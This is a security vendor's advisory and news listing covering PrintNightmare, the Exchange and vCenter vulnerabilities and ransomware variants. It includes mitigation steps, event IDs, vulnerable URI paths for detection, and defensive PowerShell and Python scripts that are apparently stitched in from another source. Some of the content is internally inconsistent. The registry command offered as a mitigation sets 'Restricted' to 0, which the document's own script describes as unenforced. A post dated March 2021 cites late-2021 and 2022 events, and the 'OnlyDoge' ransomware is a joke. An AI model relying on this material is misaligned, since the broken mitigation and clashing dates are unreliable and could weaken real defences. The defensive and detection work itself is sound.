    PrintNightmare Update: How To Mitigate The Vulnerability

    IT and security teams wait for Microsoft to release a permanent fix for the vulnerability dubbed PrintNightmare, but organizations must stay protected in the meantime.

    In this livestream, join Blumira’s Matthew Warner, CTO and Co-Founder, Mike Behrmann, Director of Security, Patrick Garrity, VP of Operations, as well as Marius Sandbu, Guild Lead, Public Cloud at TietoEVRY. They'll discuss what they know about the vulnerability and mitigation steps to take. They’ll cover:

    • Updates related to the PrintNightmare incident
    • Detections you can monitor to limit your exposure while you wait for a Microsoft patch
    • Tools you can use to protect your organization
    • How to detect lateral movement and other tactics that attackers may use to infiltrate your Print Spooler

    This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.

    Participants

    Matt Warner, CTO and Co-Founder, Blumira

    Matt has over 10 years of experience in IT and development, focusing on business strategy, development, compliance, threat detection and penetration testing. Previously, he was Director of Security Services, Development & Security at NetWorks Group, responsible for defensive information security and services.

    Mike Behrmann, Director of Security, Blumira

    Mike served at the National Security Agency for seven years where he focused on leading computer network exploitation operations and was later deployed to the FBI Detroit Division’s Cyber Task Force as a Threat Analyst. He joined NetWorks Group in 2015 where he and Matt Warner established the company’s Managed Detection and Response (MDR) SaaS offering and later became the MDR Team Lead. From 2017 to 2020, Mike worked as a Sr. Security Operations Engineer with Domino’s in Ann Arbor. He rejoined Matt, Nick, Amanda and the rest of the Blumira family in early 2020 as the company’s Director of Security. Mike has earned numerous Global Information Assurance (GIAC) certifications over his career and holds advanced degrees in both International Affairs and Information Assurance.

    Patrick Garrity, VP of Operations, Blumira

    Patrick has years of experience in the security industry, building and scaling usable security products. He currently leads Blumira’s product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security.

    Marius Sandbu, Guild Lead, Public Cloud at TietoEVRY

    Marius is a Guild Lead of Public Cloud for TietoEVRY in Norway, where his main focus is end user computing and cloud native services. He is the author of books such as Mastering Citrix NetScaler and Getting started on Citrix NetScaler. Marius is a Microsoft MVP for Azure, Veeam Vanguard, vExpert EUC Champion, NVIDIA GRID Community Advisor, and Citrix CTP. He also blogs at msandbu.org.

    Medium
    July 1, 2021

    How To Protect Your Organization From PrintNightmare (CVE-2021-1675)

    The recent Print Spooler exploit has created confusion for security and IT teams struggling to keep their organizations protected in the midst of a major vulnerability.

    In this webinar, Matthew Warner, CTO and Co-Founder and Mike Behrmann, Director of Security at Blumira discuss the implications and remediation recommendations for this vulnerability. They’ll cover:

    • How to balance the needs of the business with the needs of your security team
    • Detections you can monitor to limit your exposure
    • Which tools you can use to protect your organization
    • How to detect lateral movement and other tactics that attackers may use to infiltrate your Print Spooler

    This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.

    Participants

    Matt Warner, CTO and Co-Founder, Blumira

    Matt has over 10 years of experience in IT and development, focusing on business strategy, development, compliance, threat detection and penetration testing. Previously, he was Director of Security Services, Development & Security at NetWorks Group, responsible for defensive information security and services.

    Mike Behrmann, Director of Security, Blumira

    Mike served at the National Security Agency for seven years where he focused on leading computer network exploitation operations and was later deployed to the FBI Detroit Division’s Cyber Task Force as a Threat Analyst. He joined NetWorks Group in 2015 where he and Matt Warner established the company’s Managed Detection and Response (MDR) SaaS offering and later became the MDR Team Lead. From 2017 to 2020, Mike worked as a Sr. Security Operations Engineer with Domino’s in Ann Arbor. He rejoined Matt, Nick, Amanda and the rest of the Blumira family in early 2020 as the company’s Director of Security. Mike has earned numerous Global Information Assurance (GIAC) certifications over his career and holds advanced degrees in both International Affairs and Information Assurance.

    Erica Mixon, Content Marketing Manager, Blumira

    Erica has over five years of experience covering the tech industry. Prior to joining Blumira, she was a senior editor at TechTarget, where she wrote about enterprise IT topics such as virtualization, Windows 10, and data center management. She holds a Bachelor’s degree in writing, literature and publishing from Emerson College.

    About Blumira’s Security Advisors Series

    Blumira’s Security Advisor Series is a weekly virtual roundtable with experts in the information security and compliance industry offering insight into timely security topics. These interactive sessions encourage questions from the audience and engagement with viewers. Our mission is to bring awareness to current cybersecurity issues and provide trusted security advisors to the broader community.

     

    Critical
    June 30, 2021

    Navigating PrintNightmare aka CVE-2021-1675

    Proof-of-concept exploit code was published on Github on June 29, 2021 for a vulnerability (CVE-2021-1675) in Print Spooler (spoolsv.exe), a Windows program that manages print jobs.

    In this webinar, Nato Riley, Integrations Engineer at Blumira will discuss the implications and remediation recommendations for this vulnerability. He'll cover:

    • Detections you can monitor to prevent the vulnerability from making an impact on your organization
    • Similar dependency-based attacks, and what we can learn from them
    • Which tools you can use to protect your organization

    This interactive, conversational-style session encourages questions and engagement with viewers — so sign up today for access to our security experts.

    Participants

    Nato Riley, Integrations Engineer, Blumira

    Nato is dedicated to helping Blumira build the most effective and efficient SIEM on the market for small to mid-sized businesses. Prior to joining Blumira, he held roles at LogRhythm and Data Network Group. Other ventures include notiaPoint, Inc., where Nato invented the Olympiad, a toolbox that makes large scale projects and deployments for cloud development projects more secure and agile. In his spare time, Nato runs a YouTube channel, Nato as Code, where he discusses topics such as infrastructure as code and building a cybersecurity career.

    Patrick Garrity, VP of Operations

    Patrick has years of experience in the security industry, building and scaling usable security products. He currently leads Blumira’s product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security.

    Critical
    June 30, 2021

    PrintNightmare (CVE-2021-1675 and CVE-2021-34527) Explained

    Proof-of-concept exploit code was published on Github on June 29, 2021 for a vulnerability (CVE-2021-1675) in Print Spooler (spoolsv.exe), a Windows program that manages print jobs.

    What Happened?

    The incident, dubbed by the internet community as “PrintNightmare,” involves two vulnerabilities:

    • CVE-2021-1675: A vulnerability that allows an attacker with low access privileges to use a malicious DLL file to escalate privilege. Threat actors can only take advantage of the vulnerability if they have direct access to the vulnerable system, so Microsoft categorized it as low-risk. The June 2021 Security Updates included a successful patch for CVE-2021-1675.
    • CVE-2021-34527: A remote code execution (RCE) vulnerability that allows threat actors to remotely inject DLLs. Microsoft rated CVE-2021-34527 as 8.8 out of 10 on the Common Vulnerability Scoring System (CVSS) scale.

    Microsoft clarified the difference in an update: “This vulnerability [CVE-2021-34527] is similar but distinct from the vulnerability that is assigned CVE-2021-1675. The attack vector is different as well. CVE-2021-1675 was addressed by the security update released on June 8, 2021.”

    Print Spooler has been around since the 90s, and comes with a long history of bugs and vulnerabilities. In May 2020, Microsoft patched CVE-2020-1048 (aka PrintDemon), a vulnerability in Print Spooler that enabled attackers to write arbitrary data to any file on the system.

    On July 6, Microsoft released an emergency out-of-band patch for PrintNightmare (KB5005010) for Windows Server 2019 and Windows 10, but not Windows Server 2012 and 2016. According to Benjamin Delpy, creator of Mimikatz, the patch does not block RCE or LPE with Point and Print enabled.

    How Bad is This?

    CVE-2021-34527 is pretty bad. The exploit code can result in a total compromise of Windows systems. The vulnerability affects versions of Windows Server (2004, 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, 20H2) and Windows (7, 8.1, RT 8.1, 10).

    Microsoft classified CVE-2021-34527 as a remote code execution (RCE) issue that can allow attackers to take full control of unpatched Windows systems.

    This vulnerability takes advantage of a default configuration on domain controllers (DCs). Authenticated users can perform this exploit directly against Domain Controllers without first needing to elevate privileges, which makes this an extremely severe situation.

    What Should I Do?

    First, assess your exposure. You can evaluate your organization’s exposure to PrintNightmare in a few ways:

    • Determine where spoolers are running, and who has permission to start those spoolers
    • Check in with your organization’s AD admin and evaluate the Printer AD Group. Evaluate how your environment is structured and who can access what.
    • Run the PowerShell command to get your spooler use statistics to determine if it is in use: Get-WMIObject Win32_PerfFormattedData_Spooler_PrintQueue | Select Name, @{Expression={$_.jobs};Label="CurrentJobs"}, TotalJobsPrinted, JobErrors
    • Evaluate your patching process and make a decision on whether you will use the emergency patch or wait for a more comprehensive patch from Microsoft.

    If you decide to apply the Microsoft patch, be aware that Point and Print-enabled systems may still be at risk.

    You can also set the RestrictDriverInstallationToAdministrators registry value to prevent non-administrators from installing printer drivers on a print server. Be aware that changes to the Windows registry can damage your system if not properly executed, so it is important to fully understand those risks.

    If you decide not to patch, remember that removing an attacker’s ability to reach these servers from the internet relies on proper segmentation and least privilege. Ensure that devices directly connected to the internet and high-profile servers (such as AD Domain Controllers) are investigated for remediation first.

    You should disable Print Spooler on all Active Directory Domain Controllers wherever possible.

    Note: Disabling or removing the print spooler will remove the ability to print to or from that device. This should be done with caution and planning.

    There are a few ways to disable it in Windows 10, including via Settings, Command Prompt, or System Configuration.

    Alternatively, Point and Print, one of the critical elements of the exploit, can also be disabled via the registry using the following command:

    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /v Restricted /t REG_DWORD /d 0 /f
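    The exposure assessment above (spooler state, domain controller role, print queue statistics, Point and Print and driver-installation policy values), as an added read-only PowerShell example that is not Blumira’s or Microsoft’s code. It assumes it runs elevated with PowerShell 3 or later, and the registry value names it reads are the Point and Print policy values Microsoft’s CVE-2021-34527 guidance covers; it changes nothing on the host.

```powershell
# Added example (not Blumira's or Microsoft's code): a read-only summary of one
# host's PrintNightmare exposure, following the checks in the article.
# Assumptions: run elevated with PowerShell 3 or later; the registry value names
# are the Point and Print policy values Microsoft's CVE-2021-34527 guidance covers.

function Get-PrintNightmareExposure {
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    # Win32_OperatingSystem.ProductType: 1 = workstation, 2 = domain controller, 3 = server
    $isDC = ((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 2)

    # Same performance class the article's command queries; _Total is excluded.
    $queues = Get-CimInstance -ClassName Win32_PerfFormattedData_Spooler_PrintQueue -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -ne '_Total' }
    $jobsPrinted = [int](($queues | Measure-Object -Property TotalJobsPrinted -Sum).Sum)

    # Point and Print policy values:
    #   Restricted = 1 ............................ "Point and Print Restrictions" policy enforced
    #   NoWarningNoElevationOnInstall = 0 ......... elevation prompt required on driver install
    #   UpdatePromptSettings = 0 .................. elevation prompt required on driver update
    #   RestrictDriverInstallationToAdministrators = 1 ... non-admins cannot install drivers
    $ppPath = 'HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $pp = [ordered]@{}
    foreach ($name in 'Restricted', 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings', 'RestrictDriverInstallationToAdministrators') {
        $item = Get-ItemProperty -Path $ppPath -Name $name -ErrorAction SilentlyContinue
        $pp[$name] = if ($null -ne $item) { [int]$item.$name } else { 'not set' }
    }

    $findings = New-Object System.Collections.Generic.List[string]
    if ($spooler -and $spooler.Status -eq 'Running') {
        if ($isDC) {
            $findings.Add('Spooler is running on a domain controller: disable it unless the DC must print.')
        } elseif ($jobsPrinted -eq 0) {
            $findings.Add('Spooler is running but has printed nothing since boot: candidate for disabling.')
        }
    }
    if ($pp['NoWarningNoElevationOnInstall'] -eq 1) {
        $findings.Add('NoWarningNoElevationOnInstall=1: driver installs skip the elevation prompt.')
    }
    if ($pp['UpdatePromptSettings'] -is [int] -and $pp['UpdatePromptSettings'] -ne 0) {
        $findings.Add('UpdatePromptSettings is not 0: driver updates skip the elevation prompt.')
    }
    if ($pp['RestrictDriverInstallationToAdministrators'] -ne 1) {
        $findings.Add('RestrictDriverInstallationToAdministrators is not 1: non-administrators may install printer drivers.')
    }

    [pscustomobject]@{
        Computer           = $env:COMPUTERNAME
        IsDomainController = $isDC
        SpoolerStatus      = if ($spooler) { $spooler.Status.ToString() } else { 'not installed' }
        TotalJobsPrinted   = $jobsPrinted
        PointAndPrint      = $pp
        Findings           = $findings
    }
}

Get-PrintNightmareExposure | Format-List
```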

    How to Detect

    Blumira security experts are actively working with the proof of concept code in the lab to develop detection solutions for customers, and will update this article accordingly.

    Enabling Sysmon will ensure that you have more visibility over your environment.

    We recommend that affected organizations update their NXLog Configuration. The new version of nxlog.conf is listed here: https://github.com/Blumira/Flowmira

    Updating the file and forcing a restart of the service will enable the forwarding of the Windows Print Service event logs.

    Additional paths in nxlog.conf:

    <Select Path="Microsoft-Windows-PrintService/Admin">*</Select>\
    <Select Path="Microsoft-Windows-PrintService/Operational">*</Select>\

    Then, you should detect activity for the following Event IDs in Windows Event Viewer:

    • PrintService/Operational EventID 808 (Failed import of DLL)
    • SmbClient/Security EventID 31017 (Rejected SMB)
    • EventID 316

    You may also detect suspicious child processes whose parent process is the spooler’s binary (spoolsv.exe).
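    A host-side hunt for the indicators listed above (PrintService Event IDs 808 and 316, SmbClient/Security 31017, and Sysmon process creations parented by spoolsv.exe), as an added example that is not Blumira’s detection rule. It assumes the PrintService/Admin and /Operational channels are enabled, Sysmon is installed with process-creation logging, and the time window is arbitrary; 316 is queried in both PrintService channels because the article does not name its channel.

```powershell
# Added example (not Blumira's detection rule): collect the PrintService and SMB
# client events the article lists, plus any Sysmon process creation (Event ID 1)
# whose parent is spoolsv.exe. Assumptions: PrintService/Admin and /Operational
# are enabled, Sysmon is installed with process-creation logging, and the
# time window is arbitrary.

function Get-PrintSpoolerSuspiciousEvents {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $out = New-Object System.Collections.Generic.List[object]

    # 808: the spooler failed to load a plug-in module (the "Failed import of DLL").
    # 316: a printer driver was added or updated. Both channels are queried so a
    # channel mismatch cannot hide an event.
    $channels = 'Microsoft-Windows-PrintService/Admin', 'Microsoft-Windows-PrintService/Operational'
    foreach ($log in $channels) {
        $events = Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 808, 316; StartTime = $since } -ErrorAction SilentlyContinue
        foreach ($e in $events) {
            $out.Add([pscustomobject]@{ Time = $e.TimeCreated; Source = $log; Id = $e.Id; Detail = ($e.Message -split "`n")[0].Trim() })
        }
    }

    # 31017: the SMB client rejected a connection (the article's "Rejected SMB").
    $smb = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-SmbClient/Security'; Id = 31017; StartTime = $since } -ErrorAction SilentlyContinue
    foreach ($e in $smb) {
        $out.Add([pscustomobject]@{ Time = $e.TimeCreated; Source = 'SmbClient/Security'; Id = $e.Id; Detail = ($e.Message -split "`n")[0].Trim() })
    }

    # Sysmon Event ID 1 whose ParentImage is spoolsv.exe: the spooler should not
    # normally spawn shells, scripting hosts or other unexpected children.
    $sysmon = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $since } -ErrorAction SilentlyContinue
    foreach ($e in $sysmon) {
        $xml = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d['ParentImage'] -match '\\spoolsv\.exe$') {
            $out.Add([pscustomobject]@{ Time = $e.TimeCreated; Source = 'Sysmon'; Id = 1; Detail = "$($d['Image']) spawned by spoolsv.exe: $($d['CommandLine'])" })
        }
    }

    $out | Sort-Object Time
}

Get-PrintSpoolerSuspiciousEvents -Hours 24 | Format-Table -AutoSize -Wrap
```

    Any Sysmon row here deserves immediate triage; 808 and 316 events should be reconciled against known driver deployments before being closed.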

    How Blumira Protects Against PrintNightmare

    Blumira’s security team released a new detection rule to all customers that identifies behavior closely associated with PrintNightmare. The rule, which is built into Blumira’s threat detection and response platform, detects potential exploit attempts of the Windows Print Spooler service based on Blumira’s own verified lab research.

    Blumira’s security experts also include recommendations when a finding is detected. In this case, we recommend that customers review DLLs from the error message. For incident response steps, Blumira recommends moving forward with the containment stage of response immediately by taking the victim device offline, suspending related user accounts, and monitoring for other suspicious behavior.

    Watch Our On-Demand Livestream

    In this livestream, join Blumira’s Matthew Warner, CTO and Co-Founder, Mike Behrmann, Director of Security, Patrick Garrity, VP of Operations, as well as Marius Sandbu, Guild Lead, Public Cloud at TietoEVRY. They’ll discuss what they know about the vulnerability and mitigation steps to take. Secure your spot here.

    Critical
    April 1, 2021

    OnlyDoge Ransomware Forces Organizations to Tighten Security Leashes

    While investigating several recent ransomware attacks, the Blumira security research team discovered a new variant of ransomware that will only accept Dogecoin as payment.

    Ransomware

    While investigating several recent ransomware attacks, the Blumira security research team discovered a new variant of ransomware that will only accept Dogecoin as payment. We’ve named the ransomware variant OnlyDoge for this reason.

    This dangerous variant furiously sniffs packets in an attempt to obtain Doge cookies and gain access to sensitive data. This makes it difficult to detect and remediate as it spreads like wildfire. Unlike other adversaries that gain access via a backdoor, OnlyDoge infiltrates systems via a Dogedoor.

    “OnlyDoge is one of the most destructive ransomware variants we’ve seen. The combination of automating remote code execution and requiring Doge as ransomware payment has increased its effectiveness,” said Matt Warner, CTO of Blumira. “It’s hard for anyone to take this threat seriously because … well, it’s Doge.”

    OnlyDoge victims are forced to pay the Doge ransom because they have no alternative to recover. However, organizations are unsure of how to acquire Dogecoin because it’s not available on common cryptocurrency exchanges such as Coinbase. Security analysts also face criticism from their kids about Doge being just a funny meme.

    Victims of an OnlyDoge attack will see this image fill the screen.

    OnlyDoge is putting stress on security programs that we haven’t seen before. Every organization should consider HODLing Dogecoin as a response to the outbreak.

    The new breed of OnlyDoge ransomware is spreading fast and there are rumors that new variants will pop up and accept other forms of payment such as NFTs, UniSocks and PancakeSwap.

    Doges are spending their Dogecoin on expensive supercars, like the one pictured here.

    We noticed that this variant spun up shortly after Elon Musk started tweeting about his passion for Doge and suspect that it might have served as the adversary’s inspiration for building this new ransomware variant.

    Unlike other ransomware variants, OnlyDoge exists only in the wild imaginations of Blumira employees and is therefore impossible to replicate. After April Fool’s Day, the attack will be only a doggone memory.



    Medium
    March 29, 2021

    Blumira + Lucidia IT Bracket Madness Roundtable: Sweet 16 of Security Threats

    As security threats and risks have continued to evolve, there is a need to detect and respond to the most common threats, techniques and tactics that result in security incidents and breaches.

    Join Lucidia and Blumira in this webinar as we cover:

    • The "Sweet 16" of security threats
    • Risks and misconfigurations that most commonly result in a breach
    • How to avoid being impacted by the "Sweet 16"

    This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.

    Low
    March 8, 2021

    An Analysis of the Most Active Ransomware Variants

    In Intel 471’s Ransomware Variants report, they found that 34 ransomware variants launched 722 attacks from October to December 2021.

    Ransomware

    This was an increase of 110 attacks compared to the previous quarter.

    Source: Intel 471

    Some of the top variants of ransomware (that is, the most active) tracked in the second half of last year can be found below, along with a synopsis of who it affects, how it works, how it evades detection and details about the infection chain.

    Lockbit 2.0

    Lockbit 2.0 was the most prominent ransomware variant in Q4 of 2021 and was responsible for 29% of all reported attacks, according to Intel 471. The variant operates as ransomware as a service (RaaS) – the operators rent access to the ransomware strain, but rely on other attackers to compromise corporate networks to deploy it.

    Formerly known as ABCD ransomware, the RaaS group emerged in 2019. As of October 2021, Lockbit 2.0 had 203 victims on its leak site, over 80% of which were small to medium-sized businesses (SMBs), according to Trend Micro.

    Lockbit 2.0 has continued to be active in 2022, prompting the FBI to issue a warning in February. The group uses a variety of tactics, techniques and procedures (TTPs) to launch an attack, which creates challenges for defense teams. It also relies on obfuscation techniques such as encoded strings and self-deleting files to evade detection.

    For initial access, Lockbit 2.0 has used tactics such as purchased access, unpatched vulnerabilities, and zero day exploits. Once in an environment, threat actors use tools such as Mimikatz to escalate privileges.

    Conti Ransomware

    Conti was the most active ransomware group of 2021, according to a report from Palo Alto Networks’ Unit 42.

    This type of ransomware is human-operated and will steal information, threatening to expose it in addition to encrypting it. It is known for leveraging fileless attack methods to make it more difficult for analysts to investigate.

    In a report from Sophos, they found that attackers were able to compromise a target’s network and gain access to domain admin credentials – within 16 minutes of exploiting a vulnerable firewall. The attackers then deployed Cobalt Strike beacons to servers to help deploy the ransomware attack.

    Indicators of compromise can be found on the Sophos Github.

    Egregor Ransomware

    A relatively newer ransomware spotted in 2020, Egregor has been involved in attacks against retailers like Kmart, Ubisoft, Barnes & Noble and the Vancouver Metro System (MalwareBytes & Fortiguard Labs). It affects Windows-based operating systems, and targets well-known organizations, random individuals and small businesses.

    Egregor has been distributed through Cobalt Strike, used to deliver and launch payloads. According to Malwarebytes, targeted environments are initially compromised through various means including brute-forcing RDP ports and phishing.

    Ryuk Ransomware

    Late in 2020, a number of U.S. agencies released an advisory of widespread Ryuk ransomware attacks targeting healthcare and public health sector organizations.

    First seen in 2018, Ryuk is spread through tools like Cobalt Strike and PowerShell Empire, as well as Mimikatz to dump plaintext Windows passwords or hash values.

    Attackers evade detection by leveraging native Windows tools to perform network discovery and move laterally throughout a network, a technique known as Living off the Land (LotL) – using already-existing legitimate tools to conduct malicious activity.

    Learn more in Ryuk Ransomware Targets Healthcare Organizations.

    Thanos Ransomware

    Initially detected in January 2020, Thanos is known as a ransomware as a service, allowing attackers to create custom ransomware payloads with developer assistance, according to BleepingComputer.

    It affects Windows users and uses tactics to bypass detection by Windows Defender (an antivirus program), as reported by Fortinet. It also leverages commands to stop or bypass detection by other popular antivirus software. Other attack campaigns included delivering a variant of Thanos via Microsoft Excel email attachments, disguised as fake billing and tax repayment documents.

    A new Thanos variant was seen targeting a computer’s MBR (master boot record) as part of its infection chain, attempting to lock users out (Security Intelligence). An attack against organizations in the Middle East and North Africa delivered Thanos and demanded a ransom of $20,000 in bitcoin.

    Ragnar Ransomware

    First seen in December 2019, Ragnar Locker targets Fortune 500 and other companies, using a variety of techniques to get network access and move laterally throughout an environment.

    Ragnar leverages native Windows administrative tools like PowerShell, Windows Group Policy Objects (GPO) for lateral movement. It targets RDP (Remote Desktop Protocol) connections, exploits managed service providers’ remote management software and domain admin access to gain a foothold in networks and elevate privileges.

    It’s one of the ransomware variants seen not only encrypting files, but also exfiltrating data to blackmail victims into paying a ransom.

    Learn more in Protecting Against Ragnar Locker Ransomware.

    WastedLocker Ransomware

    Last year, wearable tech manufacturer Garmin fell victim to the WastedLocker ransomware. WastedLocker attempts to avoid detection by behavior-based anti-ransomware tools, according to Sophos.

    Similar to other types of ransomware, it leverages existing Windows features, interacting with Windows API functions from within the memory itself, according to ZDNet. It can also encrypt cached documents in memory to avoid detection by behavior-monitoring software.

    In past attacks, WastedLocker campaigns often start with using stolen login credentials. If they have admin credentials not protected by multi-factor authentication, they can easily access a target’s systems through VPN and then disable any security tools.

    Phobos/EKING Ransomware

    First spotted in early 2019, Phobos is operated by attackers who often target smaller businesses, and it frequently pushes out new variants that evolve its attack methods (Fortinet). In one sample, researchers found a Microsoft Word document with a malicious macro designed to spread the EKING variant on an affected system.

    Phobos will scan files on logical drives, network shares and newly attached logical drives before encrypting files. In addition to encrypting files, it can terminate active operating system processes, delete local backups, and disable recovery mode and the firewall, so that rebooting the device does not stop the infection (Heimdal Security).

    BazarLoader Ransomware

    This is a Trojan commonly used to deploy Ryuk ransomware, targeting high-value enterprise targets (BleepingComputer). It’s chosen for its covertness, minimal functionality and obfuscation layer that better evades detection by security tools.

    A compromise often starts with a targeted phishing attack, then injection of the BazarLoader backdoor component into legitimate Windows processes like cmd.exe, explorer.exe and svchost.exe. It will deploy a Cobalt Strike beacon that calls for additional exploitation tools that can map a Windows domain and extract credentials.

    Ransomware Prevention & Detection

    The most active ransomware variants commonly:

    • Leverage stolen, weak or brute-forced credentials for initial access, sometimes via phishing attempts
    • Target RDP connections and VPN credentials to log in and turn off security tools
    • Evade detection by common security solutions (including Windows Defender and other antivirus software) by using legitimate Windows features to move laterally and deploy additional malicious payloads
    • Use certain tools like Cobalt Strike, PowerShell Empire, Mimikatz to assist with ransomware attacks
    • Exfiltrate or steal data for blackmail, threatening to release it publicly unless the targeted organization pays the ransom

    Blumira can help your organization prevent, detect and respond to attacks before they result in ransomware infection. Our platform detects attackers throughout each stage of a ransomware attack, including scanning, credential access, privilege escalation, data exfiltration and malicious file execution.

    Learn more in Ransomware Prevention & Detection and try Blumira’s cloud SIEM for free – deploy in hours to start detecting unknown threats in your environment today.



    Critical
    March 3, 2021

    Update Now: Microsoft Exchange Server Zero-Days

    Microsoft Security

    What Happened

    A China-based Advanced Persistent Threat (APT) actor codenamed HAFNIUM is known to be actively targeting U.S. organizations across multiple industry sectors, according to Microsoft.

    Yesterday, Microsoft released security updates designed to address several zero-day software vulnerabilities found in its on-premise Exchange product. Those include the following Microsoft Exchange Server Remote Code Execution Vulnerabilities:

    Endpoint Detection and Response (EDR) vendor Huntress Labs reported observing numerous attackers implanting webshells following exploitation, as expected. A web shell is a malicious program or script installed on a hacked server.

    Vulnerable organizations using on-premises Exchange servers are highly encouraged to consult the following Reddit chain for an updated list of observed webshell file locations – Mass Exploitation of On-Prem Exchange Servers.

    Who’s Affected

    Microsoft indicated that the zero-day vulnerabilities are present in Microsoft Exchange Server 2013, 2016, and 2019. The aforementioned EDR vendor reported that Exchange Server 2010 is also vulnerable.

    How to Mitigate

    Microsoft recommends prioritizing installing updates on Exchange Servers that are externally facing. All affected Exchange Servers should ultimately be updated.

    See the Microsoft Security Response Center’s article on Multiple Security Updates Released for Exchange Server for guidance on updating affected servers.

    Why It’s Critical to Take Action

    Two things tend to happen when zero-day exploits are publicly disclosed and patches are released:

    • The originating actor accelerates exploitation operations in the interim to take advantage of the closing window of opportunity
    • Third party actors reverse engineer the security update and develop weaponized versions of the exploits for public use

    Blumira recommends all affected organizations download, test, and install the relevant updates immediately.

    Finally, Blumira strongly recommends that clients install Sysmon on affected servers as an added precaution. Sysmon is a free EDR developed by Microsoft. Blumira offers an extensive library of pre-baked intrusion detection rules that take advantage of Sysmon. The free EDR is the perfect complement to antivirus software on any Windows endpoint.

    Sysmon is extremely easy to install and deploy – see how to turn on advanced logging in three steps in How to Enable Sysmon for Windows Logging and Security.

    Critical
    February 24, 2021

    Critical VMware vCenter RCE (CVE-2021-21972) Exploits Released

    What Happened

    Positive Technologies discovered a vulnerability in VMware vCenter/vSphere that allows an unauthenticated attacker to remotely execute code on the VMware hypervisor (CVE-2021-21972). The vulnerability was first reported to the vendor on October 2, 2020, and a patch was released by VMware on February 23, 2021.

    Is a weaponized exploit available yet?

    Proof of concept code was released to GitHub shortly after the patch, giving any attacker with access to the code the ability to take advantage of the vulnerability.

    How Bad is This?

    Bad. Any threat actor who can reach port 443 on your vCenter server can completely compromise the device, the data, and any VMs it contains.

    Several exploits are now public – you should expect that these will be used immediately to facilitate attacks. Scanning for vulnerable systems has been seen:

    We’ve detected mass scanning activity targeting vulnerable VMware vCenter servers (https://t.co/t3Gv2ZgTdt).

    Query our API for “tags=CVE-2021-21972” for relevant indicators and source IP addresses. #threatintel https://t.co/AcSZ40U5Gp

    — Bad Packets (@bad_packets) February 24, 2021


    What Should I Do?

    Make sure no vCenter assets are directly exposed to the internet; if they are, sever that access and triage those hosts for indications of compromise. If not directly exposed to the internet, prioritize patching quickly because a locally networked device could be used to exploit internal hosts. It only takes one phishing email for an actor to breach the perimeter.

    Your options are ordered from the most complete remediation to more temporary measures:

    Option 1:
    Apply the patch according to your version.

    Option 2:
    Employ a workaround to disable the vulnerable location on the server. Here are instructions on how to do that, from VMware’s knowledge base: https://kb.vmware.com/s/article/82374

    Option 3:
    Use network firewalls to restrict access on port 443 to trusted hosts only.

    How to Detect

    Watch for unusual access to vCenter hosts on port 443; if possible, target requests for the URI paths:

    /ui/vropspluginui/rest/services/
    /ui/vropspluginui/rest/services/uploadova

    For further technical details, see:
    https://swarm.ptsecurity.com/unauth-rce-vmware/
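    As an added example (not code from the original post or from Blumira), here is a small Python detection that applies the guidance above to the web-server or reverse-proxy logs in front of a vCenter host. It assumes Common Log Format input (adjust the regex for your own export), matches on the two URI paths listed above, and runs over constructed sample lines rather than real traffic; the per-source count is there so a scanner walking both paths stands out from a one-off request.

```python
import re
from collections import Counter

# URI paths named in the advisory above; any request that reaches them on a
# vCenter host is worth a look, whatever the response code.
SUSPECT_PATHS = (
    "/ui/vropspluginui/rest/services/",
    "/ui/vropspluginui/rest/services/uploadova",
)

# Assumed input: Common Log Format lines from a reverse proxy or web-server
# log in front of vCenter. Adjust the regex for your own export format.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_suspect_path(path):
    """True when the request path (query string ignored) is under the plugin endpoint."""
    bare = path.split("?", 1)[0]
    return any(bare.startswith(p) for p in SUSPECT_PATHS)


def find_vcenter_hits(lines):
    """Return one dict per log line that touches the vulnerable plugin endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the detection
        if is_suspect_path(m["path"]):
            hits.append({
                "src": m["src"],
                "ts": m["ts"],
                "method": m["method"],
                "path": m["path"],
                "status": int(m["status"]),
            })
    return hits


def hits_by_source(hits):
    """Count hits per source address so a scanner stands out from a one-off request."""
    return dict(Counter(h["src"] for h in hits))


# Constructed sample log (not real traffic): one scanner probing both paths,
# a legitimate UI login, and a second host probing with a query string.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Feb/2021:10:01:02 +0000] "GET /ui/vropspluginui/rest/services/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/Feb/2021:10:01:05 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 31',
    '10.0.0.5 - - [24/Feb/2021:10:02:00 +0000] "GET /ui/login HTTP/1.1" 200 8800',
    '198.51.100.9 - - [24/Feb/2021:10:03:10 +0000] "GET /ui/vropspluginui/rest/services/?probe=1 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    found = find_vcenter_hits(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["src"]} {h["method"]} {h["path"]} -> {h["status"]}')
    print("per source:", hits_by_source(found))
```

    The match is on the path prefix, so a probe with a query string or a trailing sub-path still counts; a POST to the upload path on an unpatched host is the case to escalate first.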



    Medium
    February 22, 2021

    Anatomy of the SolarWinds Attack: Five Types of Malware


